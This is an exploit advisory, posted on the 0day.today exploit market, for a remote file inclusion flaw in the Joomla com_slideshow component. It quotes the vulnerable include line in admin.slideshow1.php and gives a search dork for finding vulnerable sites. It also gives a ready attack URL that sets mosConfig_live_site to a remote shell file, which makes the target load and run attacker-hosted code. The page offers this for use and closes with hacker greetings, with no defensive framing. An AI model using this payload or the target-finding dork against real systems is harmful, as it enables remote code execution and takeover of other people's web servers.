[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_slideshow Remote File Inclusion Vulnerability

Author
ShockShadow
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2158
Category
web applications
Date add
20-09-2007
Platform
unsorted
==================================================================
Joomla Component com_slideshow Remote File Inclusion Vulnerability
==================================================================



--==+=================== Electronic Security Team (www.Yee7.com) ====================+==--
--==+         Joomla Component Flash Slide Show (admin.slideshow1.php) - RFI         +==--
--==+================================================================================+==--

Script Name:  Joomla Component Flash Slide Show Image Gallery
exploit:      Remote File Inclusion [High Risk]
Author:       ShockShadow - Electronic Security Team (www.Yee7.com)
Home:         www.Yee7.com
Download:     http://www.joomlahacks.com/component/option,com_remository/Itemid,41/func,download/id,491/chk,cb182dd5ecd024f36f7a8fa98dd8935e/
             http://www.box.net/shared/6xeh4doczd
Search Key:   inurl:/com_slideshow/

##############################

Line 3 of admin.slideshow1.php
>    include( "$mosConfig_live_site/components/com_slideshow1/about.html" );
==============

eXploit: http://domain.com/Joomla_Path/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://shell.txt

###############################
by: ShockShadow
GrEEtZ t0:
Mr.HaCkEr, Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, HamzaBX1, Alakrb Almoftres, Falcon Hammdan, RoMaNcYxHaCkEr
Medo Hacker, rUn-vIrUs, Dr.eXe, zAx
AND ALL FRIENDS




#  0day.today [2024-12-24]  #